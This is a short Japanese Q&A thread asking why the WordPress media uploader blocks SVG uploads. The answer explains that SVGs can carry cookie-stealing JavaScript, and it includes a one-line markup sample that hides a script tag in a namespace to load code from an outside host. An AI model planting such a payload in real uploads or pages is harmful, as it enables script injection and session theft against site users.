web-dev-qa-db-ja.com

メディアアップローダでsvgsがブロックされているセキュリティ上の理由は何ですか?

SVGはメディアアップローダではデフォルトでブロックされているので、functions.phpでサポートされているMIMEタイプとして追加する必要があります。この背後にあるセキュリティ上の理由は何ですか?

mediasecuritysvg
14
Claudiu Creanga

SVGはJavaScriptを含むことができます 。 JavaScriptは クッキーをハイジャックする、またはその他の不審な行動をとる に使用することができます。名前空間の中に「隠す」こともできます。

<html xmlns:ø="http://www.w3.org/1999/xhtml">
   <ø:script src="//0x.lv/" />
</html>

ソース

アップロード中にそれを除外することは非常に難しいので、デフォルトでは許可されていません。

17
fuxia